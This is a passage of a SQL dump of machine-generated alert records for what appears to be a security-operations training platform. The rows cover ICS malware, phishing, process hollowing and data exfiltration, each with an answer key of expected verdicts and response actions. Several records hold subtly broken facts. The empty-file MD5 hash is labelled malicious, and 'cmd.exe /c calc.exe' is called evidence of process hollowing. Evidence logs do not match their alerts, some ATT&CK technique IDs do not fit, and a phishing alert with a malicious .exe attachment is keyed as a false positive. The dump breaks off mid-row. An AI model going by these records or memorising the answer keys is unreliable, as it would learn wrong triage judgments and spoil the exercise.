AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1427, 'DGA Domains Used for C2 Communication Detected', 'high', 'Carbon Black', 'A sophisticated malware using DGA domains for C2 communication was identified on a water treatment plant\'s network.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T10:45:21Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"198.51.100.123\",\"username\":\"operator\",\"hostname\":\"PLC-Master-01\",\"domain\":\"hdsf3d2gds.example.com\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with DGA-based C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"hdsf3d2gds.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Domain used by malware for dynamic C2\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"operator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Regular operator account\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of DGA domains for C2 is indicative of an advanced persistent threat targeting the water treatment plant.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.977Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:45:21Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"198.51.100.123\\\",\\\"username\\\":\\\"operator\\\",\\\"hostname\\\":\\\"PLC-Master-01\\\",\\\"domain\\\":\\\"hdsf3d2gds.example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1428, 'Suspicious Modbus Traffic Detected on SCADA Network', 'high', 'SentinelOne', 'Unusual Modbus traffic patterns were detected, potentially indicating unauthorized PLC manipulation attempt.', 'Lateral Movement', 'T1021', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T12:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.100.10\",\"dst_ip\":\"192.168.100.20\",\"username\":\"scada_user\",\"hostname\":\"SCADA-Controller\",\"domain\":\"example.com\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.100.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP within SCADA network\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"scada_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"SCADA network user\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unusual Modbus traffic suggests a potential attempt to manipulate PLCs within the SCADA network.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.979Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:30:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.100.10\\\",\\\"dst_ip\\\":\\\"192.168.100.20\\\",\\\"username\\\":\\\"scada_user\\\",\\\"hostname\\\":\\\"SCADA-Controller\\\",\\\"domain\\\":\\\"example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1429, 'Phishing Email with Malicious URL Detected', 'medium', 'Proofpoint', 'A phishing email was detected targeting a plant operator, containing a malicious URL aimed at credential harvesting.', 'Phishing', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:05:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.90\",\"dst_ip\":\"192.168.3.25\",\"username\":\"plant_operator\",\"hostname\":\"HMI-Workstation\",\"email_sender\":\"noreply@fakebank.com\",\"url\":\"http://malicious.example.com\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"noreply@fakebank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email sender associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL not flagged in recent scans\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email appears to be a part of a broad phishing attempt, but the URL was deemed clean upon further analysis.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-03-02T13:55:06.981Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1430, 'Process Hollowing Detected on Critical ICS Workstation', 'critical', 'Sysmon', 'A process hollowing attack was detected on a critical ICS workstation, potentially indicating an APT-style attack aiming for data exfiltration.', 'Malware', 'T1055.012', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T11:20:37Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.15\",\"dst_ip\":\"203.0.113.95\",\"username\":\"system_admin\",\"hostname\":\"ICS-Workstation-02\",\"command_line\":\"cmd.exe /c calc.exe\"}', '2026-03-02 03:19:01', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.95\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to known APT infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"cmd.exe /c calc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command line indicative of process hollowing\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"system_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Privileged system admin account\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing detected, indicating a high-level intrusion attempt on the ICS workstation.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.982Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:20:37Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.15\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"username\\\":\\\"system_admin\\\",\\\"hostname\\\":\\\"ICS-Workstation-02\\\",\\\"command_line\\\":\\\"cmd.exe /c calc.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1431, 'Data Exfiltration via USB Device Detected', 'high', 'Symantec DLP', 'An employee attempted to copy sensitive company files to an unauthorized USB device. This activity was detected by the DLP system.', 'Data Exfil', 'T1059', 1, 'Closed', 266, '{\"timestamp\":\"2026-03-02T08:45:00Z\",\"event_type\":\"file_copy\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-123\",\"command_line\":\"copy C:\\\\Sensitive\\\\report.pdf E:\\\\\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-02 03:22:45', '2026-03-09 13:26:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the employee\'s machine\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with unauthorized data exfiltration attempts\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The file hash is connected to known unauthorized data exfiltration activities. Immediate action is required.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.984Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:45:00Z\\\",\\\"event_type\\\":\\\"file_copy\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-123\\\",\\\"command_line\\\":\\\"copy C:\\\\\\\\Sensitive\\\\\\\\report.pdf E:\\\\\\\\\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1432, 'Unauthorized File Access Attempt', 'medium', 'Microsoft Purview', 'An employee attempted to access restricted files on the corporate server. This access attempt was blocked.', 'Data Exfil', 'T1078', 1, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T09:15:00Z\",\"event_type\":\"file_access\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-456\",\"command_line\":\"open \\\\\\\\10.0.0.5\\\\Restricted\\\\confidential.docx\"}', '2026-03-02 03:22:47', '2026-03-09 14:29:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the employee\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the corporate server\"}}],\"expected_actions\":[\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The attempt to access restricted files indicates a possible insider threat.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.986Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:15:00Z\\\",\\\"event_type\\\":\\\"file_access\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-456\\\",\\\"command_line\\\":\\\"open \\\\\\\\\\\\\\\\10.0.0.5\\\\\\\\Restricted\\\\\\\\confidential.docx\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1433, 'Suspicious Network Connection Detected', 'critical', 'Netskope', 'A suspicious outbound connection to a known malicious IP was detected from an internal host.', 'Malware', 'T1078', 1, 'investigating', 234, '{\"timestamp\":\"2026-03-02T10:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-789\"}', '2026-03-02 03:22:47', '2026-03-03 19:44:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the employee\'s device\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The destination IP is associated with known malware distribution, confirming the malicious intent.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 